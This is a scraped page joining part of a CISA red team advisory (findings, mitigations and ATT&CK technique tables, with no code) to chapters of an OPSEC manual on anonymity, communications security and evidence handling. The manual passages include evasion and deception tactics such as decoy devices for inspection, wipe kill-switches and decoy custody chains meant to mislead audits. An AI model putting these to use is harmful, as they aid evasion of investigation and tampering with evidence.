|Trigger Host-Based Protection- Domain Controller|Uploads and executes a well-known (e.g., with a signature) malicious file to a target DC system to generate host-based alerts.|Ingress Tool Transfer [T1105]|Malicious file was removed by host-based endpoint protection system.|Host based detection tools can be helpful in detecting known IOCs. However, organizations should focus on detecting anomalous behavior by monitoring their networks and hosts against good baselines. The blocking of this well-known tool on a DC should trigger an urgent investigation.| |Ransomware Simulation|Executes simulated ransomware on multiple workstation systems to simulate a ransomware attack.Note: This technique does not encrypt files on the target system.|N/A|Two out of nine users reported the event to defensive staff who identified all hosts that executed the ransomware. Five users likely rebooted their systems when observing the ransomware, one logged off and on, one closed the ransomware application repeatedly and continued working, one locked their screen, and another user exited the ransomware process after two hours.|Security awareness training should provide employees effective tools on how to respond to ransomware activity.|The red team noted the following lessons learned relevant to all organizations generated from the security assessment of the organization’s network. These findings contributed to the team’s ability to gain persistent access across the organization’s network. See the Mitigations section for recommendations on how to mitigate these findings.The assessed organization had insufficient technical controls to prevent and detect malicious activity. The organization relied too heavily on host-based EDR solutions and did not implement sufficient network layer protections. Finding #1: The organization’s perimeter network was not adequately firewalled from its internal network, which allowed the red team a path through the DMZ to internal networks. A properly configured network should block access to a path from the DMZ to other internal networks. Finding #2: The organization was too reliant on its host-based tools and lacked network layer protections, such as well-configured web proxies or intrusion prevention systems (IPS). The organization’s EDR solutions also failed to catch all the red team’s payloads. Below is a list of some of the higher risk activities conducted by the team that were opportunities for detection: Phishing; Kerberoasting; Generation and use of golden tickets; S4U2self abuse; Anomalous LDAP traffic; Anomalous NFS enumeration; Unconstrained Delegation server compromise; DCSync; Anomalous account usage during lateral movement; Anomalous outbound network traffic; Anomalous outbound SSH connections to the team’s cloud servers from workstations; and Use of proxy servers from hosts intended to be restricted from internet access. Finding #3: The organization had insufficient host monitoring in a legacy environment. The organization had hosts with a legacy operating system without a local EDR solution, which allowed the red team to persist for several months on the hosts undetected. The organization’s staff requires continuous training, support, and resources to implement secure software configurations and detect malicious activity. Staff need to continuously enhance their technical competency, gain additional institutional knowledge of their systems, and ensure are provided sufficient resources by management to adequately protect their networks. Finding #4: The organization had multiple systems configured insecurely. This allowed the red team to compromise, maintain persistence, and further exploit those systems (i.e., access credentials, elevate privileges, and move laterally). Insecure system configurations included: Default server configurations. The organization used default configurations for hosts with Windows Server 2012 R2, which allows unprivileged users to query membership of local administrator groups. This enabled the red team to identify several standard user accounts with administrative access. Note: By default, NFS shares change the root user to the nfsnobody user, an unprivileged user account. In this way, users with local root access are prevented from gaining root level access over the mounted NFS share. Here, the organization deviated from the secure by default configuration and implemented the no_root_squash option to support a few legacy systems instead. This deviation from the default allowed the red team to escalate their privileges over the domain. Hosts with **Unconstrained Delegation** enabled unnecessarily. Hosts with Unconstrained Delegation enabled will store the Kerberos TGTs of all users that authenticate to that host. This affords threat actors the opportunity to steal TGTs, including the TGT for a domain controller, and use them to escalate their privileges over the domain. Insecure Account Configuration. The organization had an account running a Linux webserver with excessive privileges. The entry for that user in the sudoers file—which controls user rights—contained paths with wildcards where that user had write access, allowing the team to escalate privileges. Note: This file should only contain specific paths to executable files that a user needs to run as another user or root, and not a wildcard. Users should not have write access over any file in the sudoers entry. Finding #5: The red team’s activities generated security alerts that network defenders did not review. In many instances, the organization relied too heavily on known IOCs and their EDR solutions instead of conducting independent analysis of their network activity compared against baselines. Finding #6: The organization lacked proper identity management. Because network defenders did not implement a centralized identity management system in their Linux network, they had to manually query every Linux host for artifacts related to the red team’s lateral movement through SSH. Defenders also failed to detect anomalous activity in their organization’s Windows environment because of poor identity management. The organization’s leadership minimized the business risk of known attack vectors for their organization. Leadership deprioritized the treatment of a vulnerability their own cybersecurity team identified, and in their risk-based decision-making, miscalculated the potential impact and likelihood of its exploitation. Finding #7: The organization used known insecure and outdated software. The red team discovered software on one of the organization’s web servers that was outdated. After their operations, the red team learned the insecure and outdated software was a known security concern. The organization’s security team alerted management to the risks associated this software, but management accepted the risk. Next, the security team implemented a VDP program, which resulted in a participant exploiting the vulnerability for initial access. The VDP program helped the security team gain management support, and they implemented a web application firewall (WAF) as a compensating control. However, they did not adequately mitigate the vulnerability as they configured the WAF to be only in monitoring mode. The security team either did not have processes (or implement them properly) to scan, assess, and test whether they treated the vulnerability effectively. The red team noted the following additional issues relevant to the security of the organization’s network that contributed to their activity. Unsecured Keys and Credentials. The organization stored many private keys that lacked password protection, allowing the red team to steal the keys and use them for authentication purposes. The private key of a PFX file was not password protected, allowing the red team to use that certificate to authenticate to active directory, access UDHOST, and eventually compromise the DC. In addition, the organization did not require password protection of SSH private keys. Note: Without a password protected key, an actor can more easily steal the private key and use it to authenticate to a system through SSH. The organization had files in a home share that contained cleartext passwords. The accounts included, among other accounts, a system administrator. Note: The organization appeared to store cleartext passwords in the description and user password sections of Active Directory accounts. These passwords were accessible to all domain users. Email Address Verification. The active Microsoft Office 365 configuration allows an unauthenticated external user to validate email addresses through observing error messages in the form of HTTP 302 versus HTTP 200 responses. This misconfiguration helps threat actors verify email addresses before sending phishing emails. The red team noted the following technical controls or defensive measures that prevented or hampered offensive actions: Network defenders detected the initial compromise and some red team movement. After being alerted of the web shell, the organization initiated hunt activities, detected initial access, and tracked some of the red team’s Phase I movements. The organization terminated much of the red team’s access to the organization’s internal network. Of note, once the organization’s defenders discovered the red team’s access, the red team spent significant time and resources continuously refortifying their access to the network. Host-based EDR solutions prevented initial access by phishing. The EDR stopped the execution of multiple payloads the red team sent to a user of the organization over a week long period. The organization leveraged two products on workstations, one that was publicly discoverable and another the red team did not learn about until gaining initial access. The product the red team was unaware of, and did not test their payload against, was responsible for stopping the execution of their payloads. Strong domain password policy. The organization’s domain password policy neutralized the red team’s attempts to crack hashes and spray passwords. The team was unable to crack any hashes of all 115 service accounts it targeted. Effective separation of privileges. The organization’s administrative users had separate accounts for performing privileged actions versus routine activities. This makes privilege escalation more difficult for threat actors.
CISA recommends organizations implement the recommendations in Table 2 to mitigate the findings listed in the Lessons Learned and Key Findings section of this advisory. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. See CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.Table 2: Recommendations to Mitigate Identified Findings |Finding|Recommendation| |---|---| |Insufficient Network Segmentation of DMZ|- Apply the principle of least privilege to limit the exposure of systems and services in the DMZ.
- Segment the DMZ based on the sensitivity of systems and services [CPG 2.F].- Implement firewalls, access control lists, and intrusion prevention systems.|
|Insufficient Network Monitoring|- Establish a security baseline of normal network traffic and tune network appliances to detect anomalous behavior. Tune host-based products to detect anomalous binaries, lateral movement, and persistence techniques [CPG 3.A]. - Create alerts for Windows event log authentication codes, especially for the domain controllers. This could help detect some of the pass-the-ticket, DCSync, and other techniques described in this report.- Reduce the attack surface by limiting the use of legitimate administrative pathways and tools such as PowerShell, PsExec, and WMI, which are often used by malicious actors. Select one tool to administer the network, enable logging, and disable the others.|
|Insufficient Host Monitoring in Legacy Environment|- Implement an EDR solution to monitor legacy hosts for suspicious activity and to detect breaches [CPG 3.A].| |Insecure configurations of systems|- Do not use the **no_root_squash** option.- Remove **Unconstrained Delegation** from all servers. If Unconstrained Delegation functionality is required, upgrade operating systems and applications to leverage other approaches (e.g., Constrained Delegation) or explore whether systems can be retired or further isolated from the enterprise.- Consider disabling or limiting NTLM and WDigest Authentication if possible. Instead, use modern federation protocols (SAML, OIDC) or Kerberos for authentication with AES-256 bit encryption.
- If NTLM must be enabled, enable Extended Protection for Authentication (EPA) to prevent NTLM-relay attacks, and implement SMB signing to prevent certain adversary-in-the-middle and pass-the-hash attacks. See Microsoft Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS) and Microsoft Overview of Server Message Block signing for more information.- Adhere to the principle of least privilege.- Ensure the **sudoers** file contains only essential commands, avoids the use of wildcards, and contains password requirements for command execution.| |Lack centralized identity management and monitoring systems|- From a detection standpoint, focus on identity and access management (IAM) rather than just network traffic or static host alerts.- Examine who is accessing a resource, what is being accessed, where the request originates, and the time of activity.| |Use of known insecure and outdated software|- Keep systems and software up to date. If updates cannot be uniformly installed, update insecure configurations to meet updated standards.|
|Insecure Keys and Credentials|- Implement a password protection policy for all certificates that contain private keys that ensures every certificate is encrypted with a strong password. Ensure all certificates are stored in a secure location [CPG 2.L].
- Regularly audit network shares to identify files that contain passwords accessible to multiple users [CPG 2.L].- Provide training on the proper use of password management tools.
- Implement a policy that prohibits storing passwords in plaintext, and regularly review and audit Active Directory for plain text passwords [CPG 2.L].- If system administrators must store passwords in active directory, restrict access to only users who require them.|Additionally, CISA recommends organizations implement the mitigations below to improve their cybersecurity posture: Provide users with regular training and exercises, specifically related to phishing emails. Phishing accounts for majority of initial access intrusion events.
Enforce phishing-resistant MFA to the greatest extent possible. Reduce the risk of credential compromise via the following: Place domain admin accounts in the protected users group to prevent caching of password hashes locally; this also forces Kerberos AES authentication as opposed to weaker RC4 or NTLM authentication protocols. Upgrade to Windows Server 2019 or greater and Windows 10 or greater. These versions have security features not included in older operating systems.
As a long-term effort, CISA recommends organizations prioritize implementing a more modern, Zero Trust network architecture that: Leverages secure cloud services for key enterprise security capabilities (e.g., identity and access management, endpoint detection and response, and policy enforcement). Upgrades applications and infrastructure to leverage modern identity management and network access practices. Centralizes and streamlines access to cybersecurity data to drive analytics for identifying and managing cybersecurity risks. Invests in technology and personnel to achieve these goals. The above mitigations apply to critical infrastructure organizations with on-premises or hybrid environments. Recognizing that insecure software is the root cause of many of these flaws and responsibility should not fall on the end user, CISA urges software manufacturers to implement the following: Embed security into product architecture throughout the entire software development lifecycle (SDLC).
Eliminate default passwords. Do not provide software with default passwords. To eliminate default passwords, require administrators to set a strong password [CPG 2.B] during installation and configuration. Design products so that the compromise of a single security control does not result in compromise of the entire system. For example, narrowly provision user privileges by default and employ ACLs to reduce the impact of a compromised account. This will make it more difficult for a malicious cyber actor to escalate privileges and move laterally.
Mandate MFA, ideally phishing-resistant MFA, for privileged users and make MFA a default, rather than opt-in, feature. Reduce hardening guide size, with a focus on systems being secure by default. In this scenario, the red team noticed default Windows Server 2012 configurations that allowed them to enumerate privileged accounts. Important: Manufacturers need to implement routine nudges that are built into the product rather than relying on administrators to have the time, expertise, and awareness to interpret hardening guides.
These mitigations align with principles provided in the joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software. CISA urges software manufacturers to take ownership of improving security outcomes of their customers by applying these and other secure by design practices. By adhering to secure by design principles, software manufacturers can make their product lines secure out of the box without requiring customers to spend additional resources making configuration changes, purchasing security software and logs, monitoring, and making routine updates.
For more information on secure by design, see CISA’s Secure by Design webpage. For more information on common misconfigurations and guidance on reducing their prevalence, see the joint advisory NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations.In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.To get started: Select an ATT&CK technique described in this advisory (see Table 3 to Table 16). Align your security technologies against the technique. Test your technologies against the technique. Analyze your detection and prevention technologies’ performance. Repeat the process for all security technologies to obtain a set of comprehensive performance data. Tune your security program, including people, processes, and technologies, based on the data generated by this process. CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
See CISA’s RedEye tool on CISA’s GitHub page. RedEye is an interactive open source analytic tool used to visualize and report red team command and control activities. See CISA’s RedEye tool overview video for more information.
See CISA’s Phishing Guidance.
See CISA’s Secure by Design page to learn more about secure by design principles.
See Table 3 to Table 16 for all referenced red team tactics and techniques in this advisory. Note: Unless noted, activity took place during Phase I. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.Table 3: Reconnaissance |Technique Title|ID|Use| |---|---|---|
|Gather Victim Network Information|T1590|The team conducted open source research on the target organization to gain information about its network.|
|Gather Victim Network Information: Network Security Appliances|T1590.006|The team conducted open source research on the target organization to gain information about its defensive tools.|
|Gather Victim Identity Information: Employee Names|T1589.003|The team conducted open source research on the target organization to gain information about its employees.|
|Active Scanning|T1595|The team conducted external reconnaissance of the organization’s network.|
|Gather Victim Network Information: IP Addresses|T1590.005|The team conducted reconnaissance of the organization’s external IP space.|
|Search Open Websites/Domains|T1593|The team conducted open source research to identify information about the organization’s network.|
|Gather Victim Identity Information: Email Addresses|T1589.002|The team looked for email addresses and names to infer email addresses from the organization’s email syntax.|
|Search Open Technical Databases: Scan Databases|T1596.005|The team conducted reconnaissance with several publicly available tools, such as Shodan and Censys, to discover accessible devices and services on the internet.|
|Search Open Technical Databases: DNS/Passive DNS|T1596.001|The team performed reverse DNS lookups on IP addresses within the ranges the TAs provided.|Table 4: Resource Development |Technique Title|ID|Use| |---|---|---|
|Acquire Infrastructure|T1583|The team used third-party owned and operated infrastructure and services throughout its assessment.|
|Obtain Capabilities: Tool|T1588.002|The team obtained tools (i.e., Sliver, Mythic, Cobalt Strike, and other commercial C2 frameworks).|Table 5: Initial Access |Technique Title|ID|Use| |---|---|---|
|Phishing|T1566|The team designed spearphishing campaigns tailored to employees of the organization most likely to communicate with external parties.|
|Exploit Public-Facing Application|T1190|The team gained initial access to the target by exploiting an internet-facing Linux web server.|
|Phishing: Spearphishing Link|T1566.002|The team sent tailored spearphishing emails to 13 targets.|Table 6: Execution |Technique Title|ID|Use| |---|---|---|
|User Execution|T1204|The team’s phishing attempts were ultimately unsuccessful; targets ran the payloads, but their execution did not result in the red team gaining access into the network.|
|User Execution: Malicious File|T1204.002|One user responded and executed two malicious payloads.|
|Command and Scripting Interpreter|T1059|The preexisting web shell allowed the team to run arbitrary commands on the server.|
|Command and Scripting Interpreter: Python|T1059.006|The team used python scripts.|
|System Services: Service Execution|T1569.002|The team compromised a Domain Admin account and used it to run PSExec on multiple workstations and a domain controller.|
|Remote Services: SMB/Windows Admin Shares|T1021.002|The team established a session that originated from a target.|Table 7: Persistence |Technique Title|ID|Use| |---|---|---|
|Server Software Component: Web Shell|T1505.003|After the failed spearphishing campaigns, the red team continued external reconnaissance of the network and discovered a web shell left from a previous VDP program.|
|Boot or Logon Initialization Scripts|T1037|The team backdoored several scripts run at boot time for persistence.|
|Scheduled Task/Job: Cron|T1053.003|Some of the team’s techniques included modifying preexisting scripts run by the cron utility and ifup-post scripts.|
|Boot or Logon Initialization Scripts: Network Logon Script|T1037.003|The team modified preexisting scripts run by the cron utility and ifup-post scripts.|
|Event Triggered Execution: Unix Shell Configuration Modification|T1546.004|The team used a backdoor in .bashrc.|
|Create Account: Local Account|T1136.001|During Phase II, the team created a local administrator account on a target server system.|
|Account Manipulation|T1098|During Phase II, the team created a local administrator account on a target server system.|
|Create Account: Domain Account|T1136.002|The team created AD accounts and added them to domain admins group.|Table 8: Privilege Escalation |Technique Title|ID|Use| |---|---|---|
|Valid Accounts|T1078|The team moved laterally from the web server to the organization’s internal network using valid accounts.|
|Abuse Elevation Control Mechanism: Sudo and Sudo Caching|T1548.003|The team discovered that WEBUSER1 had excessive sudo rights, allowing them to run some commands as root without a password.|Table 9: Defense Evasion |Technique Title|ID|Use| |---|---|---|
|Process Injection|T1055|The team modified its processes by changing their names in memory and at execution.|
|Reflective Code Loading|T1620|The team used Python scripts run in memory to avoid on-disk detection.|
|Obfuscated Files or Information: Binary Padding|T1027.001|The team inflated its file sizes above the upload threshold of the organization’s EDR.|Table 10: Credential Access |Technique Title|ID|Use| |---|---|---|
|Unsecured Credentials: Credentials In Files|T1552.001|The team discovered credential material on a misconfigured Network File System.|
|Steal or Forge Authentication Certificates|T1649|The team used a certificate for client authentication discovered on the NFS share to compromise a system configured for Unconstrained Delegation.|
|Steal or Forge Kerberos Tickets: Golden Ticket|T1558.001|The team acquired a ticket granting ticket for a domain controller.|
|Unsecured Credentials: Bash History|T1552.003|The team used its escalated privileges to search bash command histories.|
|Data from Network Shared Drive|T1039|The team used its escalated privileges to search for private certificate files, Secure Shell (SSH) private keys, passwords, bash command histories, and other sensitive data across all user files on the NFS share.|
|Unsecured Credentials: Private Keys|T1552.004|The team initially obtained 61 private SSH keys and a file containing valid cleartext domain credentials.|
|Valid Accounts: Domain Accounts|T1078.002|The team initially obtained 61 private SSH keys and a file containing valid cleartext domain credentials.|
|Network Sniffing|T1187|The red team leveraged this administrative access to upload a modified version of Rubeus in monitor mode to capture incoming tickets.|
|OS Credential Dumping: DCSync|T1003.006|The team used DCSync through Linux tunnels to acquire the hash of several privileged accounts.|Table 11: Discovery |Technique Title|ID|Use| |---|---|---|
|System Network Configuration Discovery|T1016|The team leveraged the web shell to identify an open internal proxy server.|
|Account Discovery|T1087|The team leveraged their AD data to identify administrators of the SCCM servers.|
|Account Discovery: Domain Account|T1087.002|The team queried LDAPS to collect information about users, computers, groups, access control lists (ACL), organizational units (OU), and group policy objects (GPO). During Phase II, the team performed AD enumeration by querying all domain objects from the DC, as well as enumerating trust relationships within the AD Forest, user accounts, and current session information from every domain computer.|
|Remote System Discovery|T1018|The team queried LDAPS to collect information about users, computers, groups, access control lists (ACL), organizational units (OU), and group policy objects (GPO). During Phase II, the team performed AD enumeration by querying all domain objects from the DC as well as enumerating trust relationships within the AD Forest, user accounts, and current session information from every domain computer.|
|Permission Groups Discovery: Domain Groups|T1069.002|The team queried LDAPS to collect information about users, computers, groups, access control lists (ACL), organizational units (OU), and group policy objects (GPO).|
|Group Policy Discovery|T1615|The team queried LDAPS to collect information about users, computers, groups, access control lists (ACL), organizational units (OU), and group policy objects (GPO).|
|Network Service Discovery|T1046|The team scanned SMB port 445/TCP.During Phase II, the team launched a scan from inside the network from a previously gained workstation.|
|Permission Groups Discovery|T1069|The team discovered a user account through querying the Windows Server 2012 R2 target.|
|Permission Groups Discovery: Local Groups|T1069.001|The team used Windows API calls to NetLocalGroupEnum and NetLocalGroupGetMembers to query local groups.|
|Domain Trust Discovery|T1482|During Phase II, the team enumerated trust relationships within the AD Forest.|
|System Owner/User Discovery|T1033|During Phase II, the team performed AD enumeration by querying all domain objects from the DC, as well as enumerating trust relationships within the AD Forest, user accounts, and current session information from every domain computer.|Table 12: Lateral Movement |Technique Title|ID|Use| |---|---|---|
|Taint Shared Content|T1080|Since no_root_squash was used, the team could read and change any file on the shared file system and leave trojanized applications.|
|Remote Services: SSH|T1021.004|The team’s acquisition of SSH private keys of user and service accounts, including two highly privileged accounts with root access to hundreds of servers, facilitated unrestricted lateral movement to other Linux hosts.|
|Software Deployment Tools|T1072|Access to an Ansible Tower system provided the team easy access to multiple SBSs.|Table 13: Collection |Technique Title|ID|Use| |---|---|---|
|Data from Information Repositories|T1213|The team accessed a database that received information from OT devices to feed monitoring dashboards, which the organization used to make decisions.|Table 14: Command and Control |Technique Title|ID|Use| |---|---|---|
|Ingress Tool Transfer|T1105|The team then downloaded and executed a Sliver payload that utilized this proxy to establish command and control.During Phase II, the team uploaded and executed a well-known malicious file to a target DC system to generate host-based alerts.|
|Application Layer Protocol: Web Protocols|T1071.001|In the organization’s Linux environment, the red team leveraged HTTPS connections for C2.|
|Proxy: Internal Proxy|T1090.001|The team leveraged an open internal HTTPS proxy for their traffic.|
|Application Layer Protocol: File Transfer Protocols|T1071.002|The team connected to servers over SMB.|
|Proxy: External Proxy|T1090.002|The team used cloud platforms to create flexible and dynamic redirect servers to send traffic to the team’s servers.|
|Encrypted Channel|T1573|The team encrypted all data in transit and secured all data at rest through a VPN with multifactor authentication.|
|Proxy: Domain Fronting|T1090.004|The team used domain fronting to disguise outbound traffic.|
|Application Layer Protocol|T1071|During Phase II, the team established a session that originated from a target Workstation system directly to an external host over a clear text protocol, such as HTTP.|Table 15: Exfiltration |Technique Title|ID|Use| |---|---|---|
|Exfiltration Over Alternative Protocol|T1048|During Phase II, the team sent a large amount of mock sensitive information to an external host.|Table 16: Impact |Technique Title|ID|Use| |---|---|---|
|Account Access Removal|T1531|The team locked out several administrative AD accounts in rapid succession.|
This product is provided subject to this Notification and this Privacy & Use policy.
tema-opsec-completo-analista ]]>projects/opsec/cisa-red-team-assessment-critical-infra.htmlProjects/opsec/cisa-red-team-assessment-critical-infra.mdTue, 28 Apr 2026 14:29:12 GMT<figure><img src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-11/Figure%201%20-%20Timeline%20of%20Red%20Team%20Activity%20%28CI%29.png?itok=nzy7agO2"></figure>manual-paranoid-opsec. Cada capitulo es una nota propia para consulta directa por dominio operativo. Use dedicated offline workstations for the most sensitive tasks. Transfer data only via unidirectional methods (write-once optical media, data diodes). Always verify with cryptographic checksums (SHA-256, BLAKE2b) after transfer. Never re-encode or alter originals — maintain pristine copies. Deploy honey identities: decoy personas designed to lure adversary attention. Use canary documents and URLs embedded with invisible trackers. Monitor unauthorized access attempts to detect leaks early.
Service: https://canarytokens.org/ Regularly submit opt-out requests to data brokers and people-search engines. Maintain a removal calendar (quarterly or semi-annual). Log confirmations and track re-appearance of records. Where opt-out fails, consider flooding profiles with false but benign data. Vary sentence length, punctuation, and structure across personas. Randomize time-of-day posting patterns. Avoid rare idioms, unique expressions, or specialized jargon that can fingerprint you. Test against stylometric analysis tools like JStylo or Writeprints. Consider author obfuscation tools, but validate for naturalness. Adversaries use: Facial recognition (Clearview, PimEyes). Voiceprints (speaker ID databases). Gait analysis (CCTV motion profiling). Camera sensor PRNU fingerprints (unique hardware “noise” signatures). Mitigation strategies: Minimize fresh biometric uploads. Apply face blurring, voice masking, or redaction where lawful. Use multiple devices to avoid consistent sensor fingerprints. Avoid cross-contamination of OSINT, HUMINT, SIGINT — each domain must remain compartmentalized. Verify intelligence via multi-domain corroboration (technical + human + contextual). Use strict data segmentation policies between investigations. Conduct red team exercises against your own setups. Simulate device seizure, phishing, metadata correlation, and stylometry attribution. Use frameworks like MITRE ATT&CK, Caldera, or custom adversary playbooks. Log results and adjust SOPs accordingly. Recognize stress and fatigue as leading OPSEC failure points. Rotate operators to prevent burnout. Train with stress inoculation drills (role-play interrogation, surveillance pressure). Maintain peer review and debrief culture to normalize mistakes. Run continuous deception environments: parallel fake infrastructures that adversaries can discover and waste resources on. Maintain multi-layered canary networks: fake identities that report back when touched. Use machine-assisted camouflage: AI models to generate realistic but distinct writing styles, browsing histories, or fake photos. Flood OSINT and search engines with false leads about your personas (AI-generated filler content). Deploy plausible decoy hardware: carry a benign laptop/phone for inspection while keeping real hardware hidden and encrypted. Create false sacrifice operations: deliberately burn one persona to validate adversary methods. Implement instant kill-switches for infrastructure: one action wipes devices, burns keys, and retires personas simultaneously. Train operators in psychological deception techniques: stress role-play, false narrative embedding, covert signaling under interrogation.
tema-opsec-completo-analista ]]>projects/opsec/opsec-advanced-topics.htmlProjects/opsec/opsec-advanced-topics.mdTue, 28 Apr 2026 14:29:12 GMTmanual-paranoid-opsec. Cada capitulo es una nota propia para consulta directa por dominio operativo. Web browsers are one of the most fingerprintable tools an investigator uses. Even without cookies, sites can identify and track users via: Headers (User-Agent, Accept-Language, Referer). Screen resolution & color depth. Fonts and plugins. Time zone & system locale. WebGL / Canvas rendering hashes. Audio context fingerprints. Hardware information (CPU cores, GPU vendor, battery stats). Maintain separate browser profiles per persona or investigation. Use different default languages, time zones, and OS UI locales to avoid overlaps. Disable autofill, password managers, and syncing. Always use private browsing/incognito but understand it does not prevent fingerprinting. For high-risk operations, use dedicated VMs or containers with a fresh browser instance for each session. Do not mix work and personal browsing on the same system. Consider sandboxed browsers (e.g., via Firejail, Qubes DisposableVMs). Use different user agents and rotate them across personas. Tor Browser: best-in-class for uniform fingerprinting; all users look alike. Mullvad Browser: similar to Tor Browser but without enforced Tor routing. Brave: offers fingerprint randomization, but not foolproof. Firefox + arkenfox: hardened with custom configs, but increases uniqueness. Test fingerprints regularly via:
https://coveryourtracks.eff.org/
https://browserleaks.com/ Treat downloads as potentially dangerous: PDFs may contain beacons. Office docs may contain macros. Always open files in sandboxed environments. Strip metadata from documents and images before sharing. For screenshots, use tools that avoid embedding device metadata. Never paste investigation content directly between personas → use an air-gap or controlled transfer channel. Never use a general-purpose browser for high-risk investigations. Instead, run disposable hardened browsers inside ephemeral VMs (destroyed after each session). Disable all JavaScript, WebRTC, and WebGL by default; only enable in tightly controlled test environments. Use network-layer obfuscation: VPN/Tor routing combined with traffic padding to defeat timing analysis. Employ browser compartment switching: e.g., one VM for passive observation (Tor Browser, no login), another for active interaction (burner identity, Mullvad Browser). For the most sensitive work: Access content via remote disposable proxies (e.g., headless browser in the cloud, viewed through VNC with no direct connection). Download suspect files only via air-gapped intermediary machines, then analyze with multi-layer sandboxes. Assume all browser activity can be correlated over time — rotate entire device/browser/VM stacks frequently.
tema-opsec-completo-analista ]]>projects/opsec/opsec-browser-fingerprinting.htmlProjects/opsec/opsec-browser-fingerprinting.mdTue, 28 Apr 2026 14:29:12 GMTmanual-paranoid-opsec. Boot hardened environment; verify VPN/Tor; minimal extensions; check firewall/kill-switch. Use persona-specific profiles; no personal logins; rotate session cookies. Update, backup encrypted vaults; verify hashes; review task list and risk flags. Refresh threat model; define objectives; select personas; confirm devices and VMs. Test fingerprint; confirm metadata scrubbing; prepare case log and hashing plan. Establish comms plan and emergency contacts; legal review if needed. Archive evidence (write-once, hashed); export logs; rotate credentials/keys as scheduled. Peer review of OPSEC; update lessons learned; schedule next audit.
tema-opsec-completo-analista ]]>projects/opsec/opsec-checklists.htmlProjects/opsec/opsec-checklists.mdTue, 28 Apr 2026 14:29:12 GMTmanual-paranoid-opsec. Cada capitulo es una nota propia para consulta directa por dominio operativo. Communication metadata is often more dangerous than content. Even with encryption, adversaries can learn: Who talks to whom, when, and how often. Device identifiers (IMEI, IMSI, MAC). Location through cell towers, Wi-Fi, or timing correlation. Patterns of activity that reveal persona overlaps. Confidentiality: protect message content with strong encryption. Anonymity: avoid linking messages to real identity. Plausible deniability: ensure you can credibly deny authorship. Ephemerality: minimize persistence of communications. Signal: strong end-to-end encryption, but tied to phone numbers. Wire: supports pseudonymous registration, strong encryption. Session: onion-routed messaging with no central metadata. Briar: peer-to-peer over Tor or Bluetooth/Wi-Fi direct, no central servers. Element (Matrix): decentralized, strong encryption, but servers may log metadata. ⚠️ Rule of thumb: if the app requires your phone number, it leaks metadata. Use encrypted apps (Signal, Wire, Jitsi with E2EE). Be mindful of voice biometrics: adversaries can fingerprint your speech. Consider voice changers or text-to-speech in sensitive ops. Avoid landlines and unencrypted VoIP providers. Use providers with strong privacy policies (ProtonMail, Tutanota). For high-risk, use self-hosted mail with Tor hidden services. Always use PGP or age for sensitive content, but remember: PGP does not hide metadata. Avoid reusing recovery emails across personas. Disable read receipts, typing indicators, and online status. Use burner accounts created over Tor with disposable emails. Avoid group chats that mix multiple personas. Strip EXIF and headers from file attachments. Use strong passphrases for encryption keys. Rotate keys regularly; never reuse across personas. Store master keys offline on hardware tokens (e.g., YubiKey, Nitrokey). Distribute keys via out-of-band channels (QR codes, paper slips, encrypted removable media). Prefer apps with disappearing messages (Signal, Session, Wire). Manually delete logs and caches after sensitive conversations. Use burner phones for temporary comms and destroy them after use. Assume all cloud backups of chats are hostile. Eliminate all persistent messaging platforms: use one-time communication channels only, then destroy keys and devices. Pre-share one-time pads (OTPs) or keys on air-gapped devices before operations. Communicate via encrypted containers (e.g., VeraCrypt, age) exchanged offline via sneakernet or air-gapped transfer. Employ steganography: hide encrypted messages inside images, audio, or video. Use voice masking or text-to-speech to prevent biometric voiceprint collection. For high-risk contacts, establish multi-channel communication redundancy (e.g., one channel for urgent signals, one for fallback, one as decoy). In extreme cases: use non-digital communication (dead drops, coded signals, couriers) to eliminate all electronic traces. Treat every communication channel as compromised by default; rotate frequently and assume metadata is logged indefinitely.
tema-opsec-completo-analista ]]>projects/opsec/opsec-comsec.htmlProjects/opsec/opsec-comsec.mdTue, 28 Apr 2026 14:29:12 GMTmanual-paranoid-opsec. Cada capitulo es una nota propia para consulta directa por dominio operativo. Integrity: preserve original data without alteration. Authenticity: ensure evidence can be verified as genuine. Confidentiality: prevent leaks during collection, transfer, or storage. Auditability: maintain a complete record of actions taken. Use forensically sound methods (write blockers, disk imaging tools). Always work on copies; keep the original in secure storage. Log every action: who collected, when, where, and how. For OSINT captures: Record URLs, timestamps, and context. Take screenshots and video captures with hashes. Store original HTML and metadata where possible. Encrypt all evidence at rest (AES-256, LUKS2, VeraCrypt, BitLocker). Use redundant storage: at least 3 copies, including offline media. Maintain hash manifests for every file (SHA-256 preferred). Store master logs in tamper-evident formats (append-only, digitally signed). Maintain a chain of custody log recording every handler, date, and action. Use digital signatures (PGP, age) to authenticate transfers. Label physical media with unique IDs and store in tamper-proof bags or cases. Use hardware tokens or secure vaults for credential storage. Prefer physical transfer (encrypted external drives) over cloud uploads. When digital transfer is unavoidable: Use end-to-end encrypted channels (OnionShare, Magic Wormhole, SecureDrop). Split large datasets into encrypted shards and send separately. Always verify hashes after transfer. Verify evidence authenticity with cryptographic checksums. Use multiple hashing algorithms (SHA-256 + BLAKE2b). Cross-check timestamps with OSINT tools (Wayback Machine, archive.today). Document validation results in case logs. Collect evidence only on air-gapped forensic workstations, never connected to the internet. Transfer via one-way data diodes or write-once optical media. Use plausible deniability containers (hidden VeraCrypt volumes, deniable LUKS headers) for the most sensitive datasets. Store evidence in geographically distributed vaults, with key shares split across multiple trusted custodians (Shamir’s Secret Sharing). Implement time-release encryption: evidence can only be decrypted after a defined period or quorum agreement. Maintain parallel chains of custody: one real, one decoy, to mislead adversaries during audits. After mission completion, conduct a forensic wipe of all temporary analysis 